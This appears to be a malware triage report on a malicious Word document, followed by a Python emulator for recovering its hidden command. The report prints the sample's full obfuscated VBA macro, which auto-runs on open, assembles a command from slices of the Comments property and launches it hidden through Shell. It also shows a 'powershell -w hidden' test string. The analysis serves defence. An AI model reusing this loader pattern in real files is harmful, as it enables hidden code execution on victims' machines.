Verdict: MALICIOUS (Risk Score 212)

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1059.001 Command and Scripting Interpreter: PowerShell
- T1204.002 User Execution: Malicious File

Malware Insights
The sample is a malicious Office document containing VBA macros. An AutoOpen macro calls a routine that rebuilds a command string from dozens of Left/Right/Mid slices of the document's "Comments" property (ActiveDocument.BuiltInDocumentProperties) and hands the result to VBA.Shell$ with window style 0 (vbHide), so the spawned process gets no visible window. A string-level reference to PowerShell suggests that command launches PowerShell, which is commonly used to download and execute further stages. Because every fragment of the command is read from document metadata rather than stored in the VBA, the command itself cannot be recovered from the decoded macro alone; the Comments property must be extracted and the slicing replayed. The ClamAV signature Doc.Macro.DollarShell-6346616-0 independently flags the file as malicious.
Heuristics (8)
- ClamAV: Doc.Macro.DollarShell-6346616-0 [critical, CLAMAV_DETECTION]. ClamAV detected this file as malware: Doc.Macro.DollarShell-6346616-0.
- VBA macros detected [medium, OLE_VBA_MACROS, 2 related findings]. Document contains VBA macro code.
- Potential Shell call in VBA [critical, OLE_VBA_SHELL]. Matched lines in script: `YnbnJtpBkPz = MPwTzfjOkG + NoUHirTTHZE` / `VBA.Shell$ YnbnJtpBkPz, 0` / `End Sub`
- AutoOpen macro [low, OLE_VBA_AUTOOPEN]. Matched lines in script: `End Sub` / `Sub AutoOpen()` / `wBwEjIoBO`
- Reference to PowerShell [high, SC_STR_POWERSHELL].
- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]. OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. (Note that this rule's canned description conflicts with the decoded VBA project listed under Extracted artifacts; the VBA-based findings above are the stronger evidence here.)
- Suspicious extracted artifact [info, EXTRACTED_FILE_STATIC_TRIAGE]. One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info, EMBEDDED_URL]. One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the standard DrawingML XML namespace URI and is expected in Office documents; it is not an indicator on its own.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6991 bytes |

SHA-256: 08e90a1f905333c663f0ce0828e0e9f439d8b6cbfab2c6b0a8d6264007069798
Detection (ClamAV, on the extracted macro source): No threats found. The Doc.Macro.DollarShell-6346616-0 hit above is on the parent document.
Obfuscation or payload: likely. 40 of 68 identifiers look randomly generated (e.g. 'TzYYwwliPvS'), consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Sub wBwEjIoBO()
SpAhVL = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 14105), 188)
sPQFMn = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 411, 75)
cuDAWiVArbh = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 8463, 130)
skjMEL = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 6389), 66)
ijpOzjDRHcQ = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 10502), 169)
iuUTroUzpu = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 7058), 22)
AAfhs = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 11573), 54)
juzNOmZw = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 1046), 37)
jwQwQNqOt = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 964), 31)
IwpmLIwf = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 5504), 166)
PVoIwjjGh = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 2657), 160)
CQFvNJjmoS = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 14384), 197)
DYwIbDddSuw = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 10043), 90)
bnTjKHMv = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 10368), 41)
ijqzw = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 7758), 164)
jRQblkAYEDD = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 8145), 94)
HSlRlVPF = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 12295, 95)
mwVSOZ = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 1358, 119)
fQaLj = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 6570), 148)
qDTIG = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 15444, 43)
HLwPzZ = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 13267, 155)
wmFHicPS = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 5940), 91)
TzYYwwliPvS = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 7138, 146)
XGdrKTwbLuC = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 11400), 17)
FZYZblhJmG = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 10981), 136)
OBiPJQKAp = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 6227), 187)
BlFwn = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 12432), 14)
DVEJqM = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 11261, 29)
ThOnlzsIvS = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 1757), 78)
cJjTKG = SpAhVL + sPQFMn + cuDAWiVArbh + skjMEL + ijpOzjDRHcQ + iuUTroUzpu + AAfhs + juzNOmZw + jwQwQNqOt + IwpmLIwf + PVoIwjjGh + CQFvNJjmoS + DYwIbDddSuw + bnTjKHMv + ijqzw + jRQblkAYEDD + HSlRlVPF + mwVSOZ + fQaLj + qDTIG + HLwPzZ + wmFHicPS + TzYYwwliPvS + XGdrKTwbLuC + FZYZblhJmG + OBiPJQKAp + BlFwn + DVEJqM + ThOnlzsIvS
MSomBzuTAH = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 3124), 148)
iqHCGihP = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 1953), 36)
cWNLLGbbXil = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 10040), 190)
sdSSwiSBnFf = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 15304), 118)
ZQDXrOF = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 2121, 64)
RZpmorZkRs = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 2473, 26)
OYoPijNtpRh = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 6607, 92)
jKXAmWmcDM = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 8191, 182)
MubbDnmL = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 9058, 100)
sPIJhr = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 12765), 87)
zrbtH = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 14791), 96)
jfWAU = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 13241), 158)
ulWmmS = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 7355), 145)
uCVVSIrco = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 9307), 70)
DNCCS = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 12097, 187)
VwZYlO = cJjTKG + MSomBzuTAH + iqHCGihP + cWNLLGbbXil + sdSSwiSBnFf + ZQDXrOF + RZpmorZkRs + OYoPijNtpRh + jKXAmWmcDM + MubbDnmL + sPIJhr + zrbtH + jfWAU + ulWmmS + uCVVSIrco + DNCCS
hFPHw = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 1658), 24)
DzsrRWiqT = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 1230), 155)
nVptpAorFd = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 5121), 143)
fhbEj = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 7543), 32)
shcmjvMNww = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 9746, 66)
EQcFXNnPP = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 9207, 41)
nGIwM = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 14966), 18)
RukhcELiGw = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 701), 2)
rtnupkDbEr = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 1711, 27)
WZbojawACG = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 5707), 19)
wWnXupGp = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 3903, 8)
aNzMTNIj = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 14655), 1)
MPwTzfjOkG = VwZYlO + hFPHw + DzsrRWiqT + nVptpAorFd + fhbEj + shcmjvMNww + EQcFXNnPP + nGIwM + RukhcELiGw + rtnupkDbEr + WZbojawACG + wWnXupGp + aNzMTNIj
NoUHirTTHZE = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 2105, 1)
YnbnJtpBkPz = MPwTzfjOkG + NoUHirTTHZE
VBA.Shell$ YnbnJtpBkPz, 0
End Sub
Sub AutoOpen()
wBwEjIoBO
End Sub
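The macro above never contains its payload; it assembles it at run time from fixed-offset slices of the document's Comments property and hands the result to Shell. The following is an added example, not code from the analyzer or the sample: a small Python emulator that replays exactly that grammar (Left, Right, Mid, Len, string concatenation, Shell) against a Comments value and records what would have been passed to Shell, without executing anything. The sample's real Comments property is not on this page, so the block runs on a constructed Comments string and a constructed short macro that reuses the three slicing idioms seen above (Mid, Right(Left(...)), Left(Right(..., Len(...) - n))); its identifiers and the recovered command are made up. For the real file, read the property with olefile's get_metadata().comments and pass it together with the olevba output.

```python
import re

# VBA string intrinsics used by the macro. VBA indexes from 1; Right/Left clamp
# to the string length instead of failing.
FUNCS = {
    "Left":  lambda s, n: s[:max(n, 0)],
    "Right": lambda s, n: s[-n:] if n > 0 else "",
    "Mid":   lambda s, start, n: s[start - 1:start - 1 + n],
    "Len":   lambda s: len(s),
}
# The macro reads every fragment from one document property; alias it to C.
PROP = 'ActiveDocument.BuiltInDocumentProperties("Comments")'

def tokenize(expr):
    tokens = re.findall(r'\d+|[A-Za-z_]\w*|\S', expr)
    bad = [t for t in tokens if not re.fullmatch(r'\d+|[A-Za-z_]\w*|[(),+\-]', t)]
    if bad:
        raise ValueError(f"unsupported token(s) {bad} in {expr!r}")
    return tokens

class MacroEmulator:
    """Evaluates assignments and Shell calls from a macro whose only operations are
    Left/Right/Mid/Len on the Comments property plus concatenation. Nothing is run:
    a Shell call is recorded, never executed. Procedure calls are ignored, which is
    fine for straight-line macros like this one."""

    def __init__(self, comments):
        self.env = {"C": comments}
        self.shell_calls = []            # (command, window_style) tuples

    def run(self, vba_source):
        for raw in vba_source.splitlines():
            line = raw.strip().replace(PROP, "C")
            m = re.fullmatch(r'([A-Za-z_]\w*)\s*=\s*(.+)', line)
            if m:
                self.env[m.group(1)] = self.evaluate(m.group(2))
                continue
            m = re.fullmatch(r'(?:VBA\.)?Shell\$?\s+(.+?)(?:,\s*(\d+))?', line)
            if m:  # second argument is the window style; 0 is vbHide, default 1 is vbNormalFocus
                style = int(m.group(2)) if m.group(2) is not None else 1
                self.shell_calls.append((self.evaluate(m.group(1)), style))
        return self.shell_calls

    def evaluate(self, expr):
        self.tokens, self.pos = tokenize(expr), 0
        value = self._sum()
        if self.pos != len(self.tokens):
            raise SyntaxError(f"trailing tokens in {expr!r}")
        return value

    def _peek(self):
        return self.tokens[self.pos] if self.pos < len(self.tokens) else None

    def _next(self):
        tok = self.tokens[self.pos]
        self.pos += 1
        return tok

    def _expect(self, want):
        got = self._next()
        if got != want:
            raise SyntaxError(f"expected {want!r}, got {got!r}")

    def _sum(self):                      # expr := term (('+' | '-') term)*
        value = self._term()
        while self._peek() in ("+", "-"):
            op, rhs = self._next(), self._term()
            value = value + rhs if op == "+" else value - rhs
        return value

    def _term(self):                     # term := NUMBER | '(' expr ')' | IDENT | FUNC '(' args ')'
        tok = self._next()
        if tok.isdigit():
            return int(tok)
        if tok == "(":
            value = self._sum()
            self._expect(")")
            return value
        if tok in FUNCS and self._peek() == "(":
            self._next()
            args = [self._sum()]
            while self._peek() == ",":
                self._next()
                args.append(self._sum())
            self._expect(")")
            return FUNCS[tok](*args)
        if tok not in self.env:
            raise NameError(f"unknown identifier {tok!r}")
        return self.env[tok]

def recover_shell_commands(vba_source, comments):
    return MacroEmulator(comments).run(vba_source)

# Constructed test data (not taken from the sample): a Comments property with the
# command fragments buried in filler, and a macro using the sample's slicing idioms.
SAMPLE_COMMENTS = ("x" * 100 + "powershell -w hidden " + "y" * 50 + "-nop -c "
                   + "z" * 70 + '"Write-Output ok"' + "w" * 40)
SAMPLE_MACRO = '''
Sub AutoOpen()
    Dnlzsq
End Sub
Sub Dnlzsq()
    aQwe = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 101, 21)
    bRty = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 179), 8)
    cUio = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 249), 17)
    dPas = aQwe + bRty
    eDfg = dPas + cUio
    VBA.Shell$ eDfg, 0
End Sub
'''

if __name__ == "__main__":
    for command, style in recover_shell_commands(SAMPLE_MACRO, SAMPLE_COMMENTS):
        print(f"Shell(window_style={style}): {command}")
```

Because the evaluator accepts only the tokens the macro actually uses and raises on anything else, it cannot be steered into running attacker-controlled code the way a quick eval()-based rewrite could; any construct outside that grammar is a signal to stop and read the macro by hand. Once the real command is recovered, the PowerShell arguments are what give the downloader stage and its infrastructure.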